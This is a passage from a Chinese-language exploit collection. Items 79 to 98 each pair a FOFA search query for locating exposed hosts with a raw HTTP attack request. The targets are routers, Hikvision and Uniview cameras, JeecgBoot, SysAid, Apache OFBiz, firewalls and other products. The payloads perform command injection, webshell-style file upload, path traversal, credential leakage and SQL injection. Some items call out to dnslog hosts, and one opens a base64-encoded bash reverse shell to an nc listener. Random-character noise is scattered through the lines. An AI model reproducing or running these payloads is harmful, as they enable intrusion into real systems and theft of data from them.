: o6 d) ~- P( t( j! |& l! a8 AHost: x.x.x.x- n2 H% Y# F8 w/ w9 b
: g# x' ?5 ]& o9 |8 d! H% G
' o0 g) O+ \+ \% ^4 Z6 z( z79. BYTEVALUE 百为流控路由器远程命令执行
F U$ y2 x) LFOFA:BYTEVALUE 智能流控路由器
: i+ P- C& E" U j, EGET /goform/webRead/open/?path=|id HTTP/1.16 S7 [) V: g; V! Y/ [2 p
Host:IP
s2 t! t1 h; U) ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.09 H3 b" k* _+ P' S* ]7 g) r! R9 I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ W% s! l f4 m- AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- d ^" X7 ~! |# B) S
Accept-Encoding: gzip, deflate; I, l# ^5 R6 T0 J2 T* {6 N
Connection: close
9 J `. c9 x, t( O( ]Upgrade-Insecure-Requests: 1+ j4 I( s9 h, \1 ~1 h
7 }$ _4 L( j% Y3 i4 Y9 I# c: t, D% ^0 d
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
L k0 D) @& E6 T, K1 |0 } ~1 Z: GFOFA:app="速达软件-公司产品"/ z, X5 W+ x) R5 ^$ W
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
- \0 u" R1 y# zHost: x.x.x.x* S Q6 |: d4 F9 o2 C2 |) T. w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 P2 I6 {, k. T/ r+ ~8 fContent-Length: 27
1 z! ~) B0 T1 @, q9 L" I1 a4 k& }- lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 d' i5 x/ X/ d' MAccept-Encoding: gzip, deflate# `* B) z; b. z, y6 m. ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 C8 I |) X; h; `Connection: close
! K$ J# Y" S7 c3 jContent-Type: application/octet-stream
5 K8 j7 g* q8 K. i, {$ tUpgrade-Insecure-Requests: 1/ X: I% v$ x" e4 E, Q' E
0 u( [1 \- j, R9 ?$ ~1 _* x3 ^
<% out.print("oessqeonylzaf");%>) T, R9 I! p0 H8 C1 c
5 {) J" F) ~( C6 n
2 e) q- r6 S: s3 q4 m4 F8 NGET /xykqmfxpoas.jsp HTTP/1.1( c$ u' ]9 x u1 H7 K& ~6 h& O
Host: x.x.x.x+ ~ D8 [ q4 s( [: ^3 C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) G: c S# r0 p) h, J) F- @3 C
Connection: close3 T- ~/ f# b- b" q
Accept-Encoding: gzip
/ w; M$ \" N: Z* _0 J- O
r0 E) m+ [' I, R8 c0 Y Z2 L- X1 X8 f$ O! v
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露( a. H0 h7 U+ |- k; T7 n
FOFA:app="uniview-视频监控"+ Z( @3 W& Y! }+ z0 x& n
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
( r3 m4 P5 c) `! _* tHost: x.x.x.x
/ Q8 I2 ?, }6 v7 a; f/ nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" a' V& F- ~' o- b
Connection: close
+ ], D( d- V" ^0 g; I+ ?Accept-Encoding: gzip+ c1 s5 c ~$ }+ m, m: ]. X. C% \
" n0 a# L4 @" [3 ]5 R& P$ Z/ ~! Z9 y" a v
5 Z, L- n& Q6 _2 F1 W' l" y. p2 Z82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行2 e, S, n6 B" ` Z1 L9 y- I; L0 ~
FOFA:app="思福迪-LOGBASE"
, G4 L! o) A- H+ Y/ w9 \( rPOST /bhost/test_qrcode_b HTTP/1.1
7 Q: U. J8 g" q( x2 t; HHost: BaseURL8 I0 F) z' }! x: \8 m6 f/ ?
User-Agent: Go-http-client/1.1
+ H' D3 V: P' _ C* j" Y5 n0 }" MContent-Length: 23
$ u3 U% k/ t2 l1 Y" ~3 s& K ~3 {) J+ \Accept-Encoding: gzip
# E* X' c5 T5 L4 ^9 t# B7 ^Connection: close6 Y6 A" H5 W3 K! z% _, {! g
Content-Type: application/x-www-form-urlencoded3 c& ^/ Y0 ^0 p; q% h
Referer: BaseURL- a& u2 Z" F. I
2 z/ u1 T) P1 B: rz1=1&z2="|id;"&z3=bhost- y9 `3 [4 o1 J( I$ V: m
, Q& l) `2 H) n
" T- A$ q, X) A" j' O; a4 ?+ [
83. JeecgBoot testConnection 远程命令执行
. l9 g6 S% W! }6 {5 {" d AFOFA:title=="JeecgBoot 企业级低代码平台"4 `9 I# q. E8 _' r
1 B7 C8 i6 {7 P' Q; b. Y
! L3 l! B. f- o z3 @* J) WPOST /jmreport/testConnection HTTP/1.1
& ]6 q4 h- d N3 h7 Y1 UHost: x.x.x.x
5 @2 M% E$ l4 `: Q& Q+ r" BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 h' D2 c2 R8 b1 n2 C& R
Connection: close
! N' W: C W- w! s4 a, W1 g9 [7 p3 AContent-Length: 88810 W5 ~4 G2 | o8 h6 Z- i* ^" [
Accept-Encoding: gzip
" s4 i4 Q8 ?( V" e6 g' HCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO") `3 D+ \, ?% B& A( b
Content-Type: application/json
0 i( T; s6 o3 }) L Z* ~9 Y7 |. x
2 K4 I6 v) e: r/ x1 r4 JPAYLOAD. e6 Q4 I3 j) {# _6 E7 p
) I( m+ Z( Z$ Q7 w& C1 G$ X
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
- Y2 N( x8 L% M7 C. U# G+ {) U4 eFOFA:title=="JeecgBoot 企业级低代码平台"5 x( G( _: K t4 ?( T
! U1 F1 ]0 S/ u/ {% e2 a3 K5 W
/ _3 F6 V7 p4 }& r! y- |
6 {, }8 ]3 G- IPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1, V$ X' s7 R$ F3 G2 x
Host: 192.168.40.130:80801 D! x( S I4 c
User-Agent: curl/7.88.1
0 O! K/ |9 J1 @/ Q7 n: `- AContent-Length: 156$ ], P( j3 b* H4 |$ Q$ R4 Z9 ]
Accept: */*& T9 u. {. C) i9 P4 k a# w4 a7 R
Connection: close" l3 v( f1 i! ~5 L' |5 O" G
Content-Type: application/json
& U p& O1 d9 E; }) M/ V( Y' C8 ZAccept-Encoding: gzip8 F' u0 g8 y/ }
0 N+ _+ S3 ], c" M6 t# ]0 M0 p{6 ^( I* _! d8 U1 K" L1 C& r
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",1 k! K; {! Z3 Z7 X
"type": "0"
) w( i$ V- U3 H6 X* \6 q6 h1 g}
2 L! k L |9 W2 O9 P% @; F: [+ T$ R1 M* G0 U
* G, z8 W6 a5 |/ W6 [85. SysAid On-premise< 23.3.36远程代码执行
, X4 b2 i$ Q* ?% f, M( Y& uCVE-2023-47246
' B5 S* r1 H/ EFOFA:body="sysaid-logo-dark-green.png"
1 d; V! ^" }5 R0 Z( V' t1 sEXP数据包如下,注入哥斯拉马1 z# s' e9 p t* O
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1! `5 B+ }/ ~9 _: K n1 c4 C4 d! S1 G
Host: x.x.x.x
; f& g6 ^$ S: n2 IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& V1 j" R1 X' D8 N$ p" zContent-Type: application/octet-stream
1 Y1 a* A9 @' g. ^9 E4 IAccept-Encoding: gzip
7 U7 n$ ]0 m- v v1 |* w/ H& ~* W; L3 Z' D3 ~
PAYLOAD
) h+ z$ v2 [7 }% H/ [. r( ?- t
7 i/ U1 \: A6 k& ~) C& n1 H- q回显URL:http://x.x.x.x/userfiles/index.jsp
5 d& U. [% O* _( Y' U8 p
# ?, A7 m5 [: \- I86. 日本tosei自助洗衣机RCE
( ^" J6 l% Z `9 P' A4 \FOFA:body="tosei_login_check.php"
4 y. O6 [4 u- S9 UPOST /cgi-bin/network_test.php HTTP/1.1! W7 y Z; R9 i" J
Host: x.x.x.x/ g M5 g4 a6 Q! @
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36% P. b f3 G$ l
Connection: close0 o9 o* I/ {' I& @" t
Content-Length: 44
# w/ i; V! Q, _3 ?1 jAccept: */*
4 ?! ?6 }% Y8 F8 H: nAccept-Encoding: gzip
* Y4 W0 ~9 j7 Q# n) M2 j& k% n% [ aAccept-Language: en4 M. L8 B N x5 ^
Content-Type: application/x-www-form-urlencoded
( O& g" A; M/ e; S) D; d, E% g' a; C" a* {- k, ]2 [
host=%0acat${IFS}/etc/passwd%0a&command=ping
2 B- a7 h$ I1 ?% n4 U& C, [: }+ M& U" y* p' P
: ?7 Q" P# k/ Q6 u87. 安恒明御安全网关aaa_local_web_preview文件上传! o: `: \% K8 h: x
FOFA:title="明御安全网关"% r1 v- ]& |6 C( B& N& d3 k. D- i
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.10 M% B6 @9 V; e* b2 U d
Host: X.X.X.X' v5 e& x$ M6 L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: ]: A- I6 O# n" t' z) HConnection: close
- t# j! A& i7 X9 p8 K9 W0 D/ rContent-Length: 1988 w4 o- ]: D T9 I4 A
Accept-Encoding: gzip- o9 r7 a7 }8 F9 i* B$ Y, I/ L
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
* g/ U8 S% U V2 M" {2 i& @- P
/ c- E+ g' _) U7 c1 K--qqobiandqgawlxodfiisporjwravxtvd$ i0 S# Y- y$ ^4 P/ \2 Z/ T
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"" E; s/ H- O. ?( C+ w6 g
Content-Type: text/plain/ _" T ]. Z# M: K- k& y& ^
$ ^3 S( ` S* _2ZqGNnsjzzU2GBBPyd8AIA7QlDq- j' ^3 ~0 f4 g4 [* d9 V
--qqobiandqgawlxodfiisporjwravxtvd--
, \2 w1 ]2 h8 P- ]! `) `& q1 \- w$ |
: i! O3 N$ b1 Z: v! Z- M' V
/jfhatuwe.php
' C5 a+ w" U6 z O) J) T9 M o+ {. Y3 [2 I
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
! j3 O- `4 \0 Z6 {FOFA:title="明御安全网关"
8 }8 V8 Y& }& [GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
( p& v9 I, X- N+ sHost: x.x.x.xx.x.x.x
/ q8 J# M5 E1 i5 f) q4 m" ?. o7 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- K; `5 Y0 s; s5 [1 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 ]% g2 y5 r: K/ e
Accept-Encoding: gzip, deflate
- k y( w- M/ o' F% EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! s; U1 Z o! ^2 R% E d
Connection: close9 v0 G) s& W/ y! A/ q# V4 ?+ Q2 n
! L1 G X) L" V: M
! g/ s, t) j9 u5 S% s! Q, ^7 X/astdfkhl.php
% x# q$ W! P: E+ T2 @4 |1 h4 M
. Z9 v+ w1 r1 \2 b4 q& e P89. 致远互联FE协作办公平台editflow_manager存在sql注入8 |5 u* P7 J2 e8 c t1 Z
FOFA:title="FE协作办公平台" || body="li_plugins_download"- |1 U0 x. A8 M
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
& k- k, L7 C% pHost: x.x.x.x8 A: i8 f# O4 K( o8 p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ ~) k" I& ^# ^- @
Connection: close
" D' r: ?! x# z/ Y' [* lContent-Length: 41
5 m4 B( _! _* j' T( u) jContent-Type: application/x-www-form-urlencoded
& z7 }, {/ D" D# Z) ~1 ]& r* U: ^Accept-Encoding: gzip4 I# |3 H* {5 u1 a, n, T
h1 }9 l3 m, [option=2&GUID=-1'+union+select+111*222--+" A4 G( z, `( Q8 M5 \# u: F
7 e& j0 Y- D2 n) ^$ e ?. G
( e- c. F& B" b# j6 `$ f0 `90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
' d5 g. b& T( U! @FOFA:icon_hash="-1830859634"
) a* `1 z9 P( BPOST /php/ping.php HTTP/1.12 b' k2 o& {$ w8 N* Y
Host: x.x.x.x! I0 P5 }, p: m: R) \2 `' J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0/ ` O, H6 |0 q/ Y3 `6 n7 B5 R
Content-Length: 51
/ T$ U0 O0 ?2 q6 Y( h& ]' L" J! {Accept: application/json, text/javascript, */*; q=0.01
" K' H! D. ?; k5 }$ b- CAccept-Encoding: gzip, deflate# W% I9 H z$ h2 L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ F, i; I0 g0 ?1 f+ }Connection: close
/ Y. R- C! X. L& P3 f6 y: lContent-Type: application/x-www-form-urlencoded% r; R+ \& }7 ^, Z( z! M
X-Requested-With: XMLHttpRequest1 o# K9 b4 A$ j9 K# o* x% G5 H: X+ X
) R. b* d* T! q9 I- p0 {
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig! h5 F3 B; G% O. h. |
5 q! @- F2 `- H! T9 v7 W; w+ k
! `( t0 x, x7 G) j a% V! I' e5 A; P91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取 i" X$ q" }' @, q; p5 e
FOFA:title="综合安防管理平台". P& x* M1 s6 K8 i( c
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1) k5 J* r) O7 P% A) A
Host: your-ip+ ]8 U1 @5 ] i5 R$ `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
8 }9 @: C5 U3 l! ?# g/ iAccept-Encoding: gzip, deflate. S, i% m" j6 q2 ?2 F- w
Accept: */*
$ f4 j- q( s/ L, t# ]) l+ f( |Connection: keep-alive2 v$ ^' S) m: a8 ^) u
. i* o' H; z$ w1 E
: I0 J: z$ `; b) q' z; g' ^6 Q
9 u$ h6 s3 g: M! {- @* {0 z4 ^92. 海康威视运行管理中心session命令执行
* x' K7 m0 d: c9 D4 JFastjson命令执行5 F* w$ X4 c$ ^# f) C/ I1 {
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
; U- A& P R; L: n9 NPOST /center/api/session HTTP/1.1
+ b8 G% B( B: u" D$ vHost:
6 d5 ^5 F8 Z) TAccept: application/json, text/plain, */*
/ c! x, w a" a( O$ ?" _+ j nAccept-Encoding: gzip, deflate
" P3 [2 ]# ^& d [4 ~8 gX-Requested-With: XMLHttpRequest
9 ?: B* V/ g8 C8 i; Y2 }Content-Type: application/json;charset=UTF-84 A) }$ ~3 d# q4 S# u% \
X-Language-Type: zh_CN
7 U% ?$ |+ @9 b, R; vTestcmd: echo test
" y2 F0 ?- x1 M( L" U: @1 S% q5 AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.367 T. p' |, |( u7 f1 O$ R$ ^
Accept-Language: zh-CN,zh;q=0.9$ Z) V% c/ B7 t: m2 g7 j
Content-Length: 5778
6 _1 }- l' Z: Y. h3 g4 @. g g: ~% K8 K/ v' W: L3 N' l9 ]
PAYLOAD
, p) F6 [9 c: ?: a3 ^5 Q8 |' b" j9 ~6 X
' P7 B: K6 \$ J0 v
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
: M, F g. z4 g1 FFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="7 L4 b, ^) l& w+ V
POST /?g=app_av_import_save HTTP/1.1
" a- Y m9 u! \Host: x.x.x.x
+ S1 p. w5 o0 Z3 \5 x+ h6 ^! bContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx" B1 \$ u+ k8 c" e% k8 U
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 `; I' S3 ?( ]6 E. {, P! o$ ^* r9 V8 O$ S. S3 j: ]' M* m( y
------WebKitFormBoundarykcbkgdfx% ]9 a9 O3 r G3 J
Content-Disposition: form-data; name="MAX_FILE_SIZE"
' y7 j0 T, j( P4 \2 a9 e* F) i. ^" D/ x; G% _ z% U
100000000 S& _ i4 v5 s
------WebKitFormBoundarykcbkgdfx
" Y0 x# N$ P2 {Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
& h& b6 }1 w/ w5 U/ XContent-Type: text/plain2 R& P& x1 F# w( d1 K: f0 _+ i) u6 t
/ g1 |5 t* Y$ f& D1 M* gwagletqrkwrddkthtulxsqrphulnknxa: q: o5 {2 t/ x h
------WebKitFormBoundarykcbkgdfx
) r8 K% f: |- u, _. j! d1 VContent-Disposition: form-data; name="submit_post"& Z" X, E8 E7 M" J
/ W/ N! H# G5 z: {" V' B6 ~- C# J
obj_app_upfile' }3 x: y+ s6 I5 o1 {8 \
------WebKitFormBoundarykcbkgdfx
" k. n1 i7 ^! f. E# n- X% U( M" n5 vContent-Disposition: form-data; name="__hash__"
0 Z" v) T9 z" p' s% y' @) T6 S( ]2 K* ^, {7 @0 Y$ r# \7 t3 Y
0b9d6b1ab7479ab69d9f71b05e0e9445
: o+ j5 ?1 A3 ~9 e, l3 d: ?: n8 X8 m------WebKitFormBoundarykcbkgdfx--
& k' }; Q: v4 t3 s5 R# l6 h, P2 o* K' f
* A- o0 z. X0 A7 {5 S
GET /attachements/xlskxknxa.txt HTTP/1.14 _& g- R8 k) b0 J7 h* q$ `' _8 n; e) |
Host: xx.xx.xx.xx
+ [ I8 l7 n' VUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
3 N% D% ?; m2 a) U9 f; ?4 d+ U1 i* e/ z) r
& m- t$ o2 b( S& V94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
. ?( C* W0 w$ i" eFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
4 R5 S6 u1 L8 d" `' A! oPOST /?g=obj_area_import_save HTTP/1.12 o8 i$ r, k$ |0 m6 S0 v
Host: x.x.x.x; S. |: L1 C+ J, h7 V' Q" S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
) |4 D! T2 u7 }8 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36% U2 P$ S5 i; o2 \7 m8 i' `3 w
/ d! k @4 D- F! S3 R
------WebKitFormBoundarybqvzqvmt
) A8 k+ Q l* ~5 ?" ~6 YContent-Disposition: form-data; name="MAX_FILE_SIZE" x. j5 W% {: l: N# ?9 n
" Q0 z2 x9 f: M9 i7 g+ T
10000000" c+ c) F- Y% J4 v
------WebKitFormBoundarybqvzqvmt# R" b8 {, R N7 K! v" Z* D
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"6 |5 D5 z* p1 `$ N+ O1 t
Content-Type: text/plain
8 @3 b; I0 d& l: G0 ~* T7 M4 V8 `5 s0 Q2 j0 }4 d6 F; N3 v: A1 J
pxplitttsrjnyoafavcajwkvhxindhmu
7 \- O o0 k( P. g: X------WebKitFormBoundarybqvzqvmt
! [0 j% {2 n/ n6 f& C# ^$ D- D xContent-Disposition: form-data; name="submit_post"
% M3 G; Z/ O5 u6 a) u' z) I4 O: U) L5 y3 g' f- @$ p; @4 ^
obj_app_upfile
' Y7 ?: k- E2 P+ @& Q; W------WebKitFormBoundarybqvzqvmt" v8 }5 R [, e2 N- N# o
Content-Disposition: form-data; name="__hash__"
: B& Y. c1 t0 l
2 b7 K6 T* a" G+ F! l0b9d6b1ab7479ab69d9f71b05e0e9445
, A; z) O/ S" i$ ]+ s+ l8 Y------WebKitFormBoundarybqvzqvmt--1 W1 H, K5 x. T* C
P. A0 h) ^& P+ \5 {
* `) q$ p( O: r9 A y' |, [4 r
& \3 @6 U* R) d5 ]3 g4 ~4 p) A1 _4 m
GET /attachements/xlskxknxa.txt HTTP/1.1
' E4 u( g( u/ w; `3 W, ^$ FHost: xx.xx.xx.xx
7 o! Q" d# ]. eUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 w" r! P H! g+ h& h
* l5 b5 o5 t# r$ s' q/ w$ l
3 |7 ~8 l7 ], y1 o: `) }1 v! m8 y' X4 \
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行; T( F1 ?2 r2 b; \! n
CVE-2023-490706 J3 a @. I- r( |4 M
FOFA:app="Apache_OFBiz"
& F$ {. w' u# e+ G% R; QPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
/ _8 L, ^. M- L- {' v0 [+ ^$ B7 {Host: x.x.x.x, C* b! S0 F: ~
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
! O) ~/ @! b: S3 Z2 s' [Connection: close5 _/ h! d4 w T7 O! ^
Content-Length: 889
$ q9 V% B7 h, f6 T/ N3 EContent-Type: application/xml
3 Q7 i* i- i2 p/ ?" C* MAccept-Encoding: gzip
+ N3 v) a, M/ B$ }- I9 }4 v4 Z; l x
<?xml version="1.0"?>% }0 L+ S; M8 U ]
<methodCall>
; r3 L0 b6 D0 ~ h5 Q2 Q Q. p <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>& r6 e' a* L9 ^; c% s7 L
<params>0 I6 E7 y+ m" ]+ P; \/ X( K- V
<param>
/ l3 x6 w/ g* K3 S4 L <value>, e) C9 N! b3 v* B
<struct>' n* |0 @5 ^! h1 Q/ o+ J
<member>
e* f1 D& Z Z" k <name>test</name>% y2 E- ]. p7 k* Z9 r
<value>7 u# J; J6 ^1 M1 V6 r
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
9 p T" J, }- V$ W; ^ </value>
+ [6 t5 R: |& S6 b K" R0 O* J" d# a | </member>
6 V- C, |) ~( Z. L, m0 D/ ` </struct>
! I. I3 X' N# h& {/ | </value>) A( m! I" u0 R' G9 p* N9 p6 T* T
</param>1 Z- H* X5 q) o S
</params>
4 R0 m6 m4 x& u) H4 c- ~# w% Q2 a& b</methodCall>' V9 \7 j9 T5 t4 y3 l4 n/ v
: U1 w }9 Z- @# C/ O3 f
' D2 l1 X' F) j; e/ m: m
用ysoserial生成payload6 v6 ]/ W8 i# C5 M! C# `
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
$ r% E/ `1 @: j* u- E0 R- |9 N$ P3 j& q3 `$ {. F. V
1 o+ q9 {/ [/ w+ j将生成的payload替换到上面的POC
' a: T! I, L: O }POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
6 }. L7 h; ?6 p& VHost: 192.168.40.130:84439 R) M- G2 g$ m% W/ f# z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36$ \# D; {, z: S4 |/ y
Connection: close* p* U: z6 S4 z
Content-Length: 889' i; g1 ~: }" Y! q; F: q( k
Content-Type: application/xml+ V( H8 j/ r/ X1 I
Accept-Encoding: gzip
0 ^) E& Y; d" q6 M0 ^& x3 n1 {' [/ m: l2 [8 z, v; l$ q
PAYLOAD
& L/ M& f3 h3 v' n6 A/ |% i3 {7 b) |) g y# A
96. Apache OFBiz 18.12.11 groovy 远程代码执行7 u1 w; q) q' u9 x) t6 ^9 i( C
FOFA:app="Apache_OFBiz"
& A: |$ V& ?+ D( ePOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
# t ?8 d# r6 K3 dHost: localhost:8443: R1 Y/ V9 B2 a! T( C- z2 Z/ L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ I8 ?; j4 H5 I C6 E; W) UAccept: */*8 O1 J$ a* j2 {' _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ f9 w5 f: u; y ^8 l3 M" rContent-Type: application/x-www-form-urlencoded3 f: w. B+ f' U( U4 S
Content-Length: 55) M7 |0 k( t! @/ v# M! T( U
) c7 c" U+ k Q, P$ m' J! q+ Z
groovyProgram=throw+new+Exception('id'.execute().text);5 p4 `1 B4 K$ P3 Y% X; Y2 m2 v
1 F, U" }- b1 |6 O
4 Z( c& z k# s0 G/ f/ P6 g
反弹shell
- x M9 Q. [1 R( N, v在kali上启动一个监听
. e4 e1 J8 C: c( j9 fnc -lvp 7777! A$ h3 I, E& C! z: S
1 l6 t: O/ w0 H. U* h& p2 u
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
' P5 d& B8 R: pHost: 192.168.40.130:8443
( x1 O* m8 y0 n8 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 |# ~' r3 t* n0 K
Accept: */*2 Z& b1 _6 o+ D5 d0 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- y O% {8 k1 F" r2 I/ X6 J
Content-Type: application/x-www-form-urlencoded
' o. o$ {) u3 C# Y i1 l: JContent-Length: 71
% O' q2 T% x- r G( o& m
$ E' j* m& u, w' V8 zgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();( R- Y: Z2 L4 F Y: {2 y
* L6 m. \% o: u/ r! V8 j7 X
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行/ c$ ]: b7 u8 [! N8 h
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"1 { Y; w4 s3 }% [* ~
GET /passport/login/ HTTP/1.1
3 K/ r+ e" m) HHost: 192.168.40.130:8085
# ]) ^" E } \9 j" _4 bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ c. v8 o' p1 t) \9 \$ O4 Y' Z3 q, j8 e
Accept-Encoding: gzip4 R. D; B" x1 d4 d8 M
Connection: close
! x) p' L, m% v) {8 l7 bCookie: rememberMe=PAYLOAD$ p2 w( @; W" D. {* V3 B
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
/ M: B7 ~/ Y0 M" ]/ P+ V% C4 l: v0 H3 M# C
+ }- a2 Y: n, G. a5 L0 u5 [98. SpiderFlow爬虫平台远程命令执行' }. q6 ` A. M
CVE-2024-0195; ~ k E' [) R4 C* r4 E% t# A- y
FOFA:app="SpiderFlow"
: t$ F$ a8 m0 k) tPOST /function/save HTTP/1.10 e( F9 [4 P) r3 h8 L$ q
Host: 192.168.40.130:8088; _: i! e9 U1 f7 L6 J Z' A- e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! T4 j# A2 I Q& _& I) @$ j2 Z7 N
Connection: close, e: D. w2 D$ \3 B* z
Content-Length: 121- D9 S) D T# N2 x" i
Accept: */*
& C; R" J0 A5 [. jAccept-Encoding: gzip, deflate
